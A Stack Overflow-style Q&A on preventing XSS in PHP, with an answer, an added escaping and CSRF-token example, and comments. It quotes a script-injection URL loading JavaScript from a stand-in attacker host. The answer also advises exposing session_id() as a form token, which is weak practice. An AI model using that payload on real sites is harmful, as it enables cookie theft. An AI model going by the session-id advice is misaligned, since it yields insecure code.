
I have found on the web many functions/classes to prevent XSS attacks. Now, what's the best PHP function/class to 100% prevent XSS attacks for input POST/GET form values?

Dharman
user27133

1 Answer

XSS (cross-site scripting) comes in many forms, one of which is allowing a user to manipulate your website content by making it mix user input with the generated HTML.

Example:

http://www.exemple.com/setname.php?name=<script src=http://evil_source.com/browser_hijack.js></script>

If your site prints $_GET['name'] somewhere, you will be injecting this evil JavaScript into your HTML, which will allow a hacker to interact with it in the name of the user, steal cookies, etc.

In this case, the best way to avoid such a thing from happening is filtering all user-originated information that is displayed on your website.

The usual way of doing that is processing user-originated content with htmlspecialchars() or htmlentities().

Another aspect of XSS that is often forgotten is cross-site posting.

Every server-side script that processes sensitive information or commands coming from the user should check that the user really posted it, and not some other origin messing with URLs or arbitrary POST requests.

This is done by using a post key that only your site knows. I suppose you can safely use the session_id() for that. This is information that only your server and the user's browser know, and no one else.

What you do is, in every <form>, include this:

<input type="hidden" name="postkey" value="<?php echo session_id(); ?>">

And in the script that handles this form, make sure $_REQUEST['postkey'] == session_id().

This will prevent other sites from inducing user actions on your site by using arbitrarily generated forms or URLs.

Havenard
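As an added example (not the answer's own code): the output encoding and the hidden post-key check described above, written as two small PHP helpers. It assumes a session-stored token generated with random_bytes() instead of reusing session_id(), and compares it with hash_equals() rather than ==; the function names are hypothetical.

```php
<?php
declare(strict_types=1);

// Added example, not from the answer above. Hypothetical helper names.
// Session must be started before any output so the cookie header can be sent.
if (session_status() !== PHP_SESSION_ACTIVE) {
    session_start();
}

function e(string $value): string
{
    // ENT_QUOTES escapes both ' and ", so the result is safe inside quoted
    // attributes as well as element content. ENT_SUBSTITUTE replaces invalid
    // UTF-8 instead of silently returning an empty string.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function csrfToken(): string
{
    // One random per-session token (assumption: random_bytes() instead of
    // the session id, so the token never has to leave the hidden field).
    if (empty($_SESSION['postkey'])) {
        $_SESSION['postkey'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['postkey'];
}

function csrfTokenIsValid(array $request): bool
{
    $sent = $request['postkey'] ?? null;
    // hash_equals() requires a string and compares in constant time; a loose
    // == against an array or integer would be accepted by mistake.
    return is_string($sent)
        && isset($_SESSION['postkey'])
        && hash_equals($_SESSION['postkey'], $sent);
}

// Constructed sample input mirroring the answer's example URL.
$name = '<script src=http://evil_source.com/browser_hijack.js></script>';
echo '<p>Hello, ' . e($name) . "</p>\n";   // tag is rendered as text, not run

echo '<input type="hidden" name="postkey" value="' . e(csrfToken()) . "\">\n";

// Form handler side: reject a missing or wrong key, accept the stored one.
var_dump(csrfTokenIsValid([]));
var_dump(csrfTokenIsValid(['postkey' => 'guessed-value']));
var_dump(csrfTokenIsValid(['postkey' => $_SESSION['postkey']]));
```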
  • I use it with my PDO queries all day long and I can confirm that this function really prevents XSS 100% for sure. IIRC it's certified by TÜV Rheinland as well as an Anti-XSS function. – hakre Jul 21 '14 at 20:12
  • *UTF-8* called, and it wants its characters back. Seriously, don't use `htmlentities()` for, well, basically anything. Instead, the proper API is [`htmlspecialchars()`](http://php.net/htmlspecialchars) – ircmaxell Jul 21 '14 at 20:13
  • @hakre I'm not sure everyone understands that you are being sarcastic. :-D – Brad Jul 21 '14 at 20:13
  • See also: http://stackoverflow.com/questions/3623236/htmlspecialchars-vs-htmlentities-when-concerned-with-xss – Brad Jul 21 '14 at 20:14
  • There are two kinds of people on the internet: those who can deal with sarcasm online, and those who cannot. The OP can deal with it, I'm perfectly sure :) – hakre Jul 21 '14 at 20:15
  • @Brad Note the most upvoted answer on that thing is... not entirely correct – PeeHaa Jul 21 '14 at 20:16
  • No answer can be entirely correct if the question is about the one function that secures it all. Never. Ever. But Stackoverflow is not a good venue for answering questions that aren't easily answerable (yes / no kind of answers), at least to some degree. – hakre Jul 21 '14 at 20:17
  • @PeeHaa Just adding more to the conversation, not making a claim either way... I use `htmlspecialchars()` myself, but some folks will argue this one all day. – Brad Jul 21 '14 at 20:17